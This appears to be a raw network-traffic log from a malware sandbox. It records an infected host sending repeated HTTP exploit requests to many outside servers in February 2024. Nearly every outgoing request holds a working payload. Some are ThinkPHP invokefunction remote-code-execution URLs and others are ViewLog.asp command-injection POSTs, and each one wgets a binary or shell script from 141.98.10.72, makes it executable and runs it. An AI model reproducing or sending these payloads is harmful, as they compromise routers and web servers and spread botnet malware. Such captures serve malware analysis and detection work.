                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            185192.168.2.233466288.174.236.23380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.083882093 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:14.289874077 CET516INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:28:11 GMT
                                                            Server: lighttpd/1.4.28
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            186192.168.2.233772888.198.154.13580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.085902929 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:14.293294907 CET903INHTTP/1.1 400 Bad Request
                                                            content-type: text/html
                                                            cache-control: private, no-cache, max-age=0
                                                            pragma: no-cache
                                                            content-length: 679
                                                            date: Wed, 14 Feb 2024 08:28:14 GMT
                                                            server: LiteSpeed
                                                            connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            187192.168.2.235610485.122.213.748080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.421471119 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            188192.168.2.234585294.123.137.1098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.551795006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            189192.168.2.235080094.121.110.1068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.551843882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            190192.168.2.235014431.200.119.2318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.551915884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            191192.168.2.233710294.121.179.1628080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.553718090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            192192.168.2.235793085.10.128.1428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.750425100 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:14.951419115 CET309INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:14 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Content-Encoding: gzip
                                                            Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            193192.168.2.234141285.18.94.108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.776735067 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            194192.168.2.235374095.220.122.1728080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.789537907 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:15.030155897 CET274INHTTP/1.0 200 OK
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:27:03 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            195192.168.2.233511894.121.176.2458080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.798221111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            196192.168.2.234025031.200.87.1608080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.799326897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            197192.168.2.233773831.136.158.1648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.977976084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:15.585195065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:16.801094055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:19.392651081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:24.255965948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.982655048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:53.435966969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.342488050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            198192.168.2.235995694.123.79.148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:15.037415028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            199192.168.2.235376495.220.122.1728080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:15.274374962 CET334INHTTP/1.0 400 Bad Request
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:27:03 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            200192.168.2.233896495.100.150.13080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:16.534971952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:16.763387918 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:16 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:16 GMT
                                                            Connection: close
